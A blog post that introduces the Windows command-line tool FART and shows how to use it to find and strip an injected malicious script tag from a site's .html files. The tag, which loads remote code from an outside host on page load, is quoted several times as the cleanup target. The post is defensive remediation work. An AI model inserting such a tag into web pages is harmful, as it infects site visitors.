FART or Find And Replace Text command line utility is a Windows improved version of the well-known ‘grep‘ command, with advanced features such as: case-adaption of the replace string; find (and replace) in filenames or auto CVS edit. You can download from Sourceforge and integrate it into your Windows environment.
Why We Need This?
For me, Windows Server 2008 R2 search tool is not really good, where its hard for me to find/replace some text into all files in certain directory recursively. Since I have experience in managing Linux box (using command line), it is really convenience to have something command-line based to do this for you.
Lets say something wrong happen to your website, which being injected, similar to this post http://blog.secaserver.com/2011/07/remove-specific-string-in-text-files/, but happen in Windows server, then this is what you need.
Here is my environment:
OS: Windows 2008 R2 64bit
Infected files: All .html files under this directory
Infected code: “<script src=http://rysawek.cz.cc/web/fol/download.php ></script>”
1. Download the application at Sourceforge, http://sourceforge.net/projects/fart-it/
2. Extract the zip files somewhere and you will see there is one file inside called fart.exe. Move or copy it to C:\Windows\system32.
3. Fart.exe should be under your Windows environment now. You can verify this by open command prompt and run following command. You should see something like below:
C:\Users\Administrator>fart Find And Replace Text v1.99b by Lionello Lunesu Usage: FART [options] [--] <wildcard>[,...] [find_string] [replace_string] Options: -h, --help Show this help message (ignores other options) -q, --quiet Suppress output to stdio / stderr -V, --verbose Show more information -r, --recursive Process sub-folders recursively -c, --count Only show filenames, match counts and totals -i, --ignore-case Case insensitive text comparison -v, --invert Print lines NOT containing the find string -n, --line-number Print line number before each line (1-based) -w, --word Match whole word (uses C syntax, like grep) -f, --filename Find (and replace) filename instead of contents -B, --binary Also search (and replace) in binary files (CAUTION) -C, --c-style Allow C-style extended characters (\xFF\0\t\n\r\\ etc.) --cvs Skip cvs dirs; execute "cvs edit" before changing files --svn Skip svn dirs --remove Remove all occurences of the find_string -a, --adapt Adapt the case of replace_string to found string -b, --backup Make a backup of each changed file -p, --preview Do not change the files but print the changes
4. So in this case, I want to delete the injected text inside my .html files. Before we delete the string, its good to have the list of infected files in a text files so you have prove and log. I will save the list as infected.txt under C partition. I will run following command:
cd C:\user1\public_html fart -r -i -c *.html 'src=http://rysawek.cz.cc/web/fol/download.php' > C:\infected.txt
5. Once you have the list of infected files, lets remove it. There are 2 ways, whether you delete the whole line as example 1 or you replace the files with ‘nothing’, means we do not specified any replace value so it will remove the string without affecting the whole line as example 2.
cd C:\user1\public_html fart -r -i -C --remove *.html 'src=http://rysawek.cz.cc/web/fol/download.php'
cd C:\user1\public_html fart -r -i -replace *.html '<script src=http://rysawek.cz.cc/web/fol/download.php ></script>'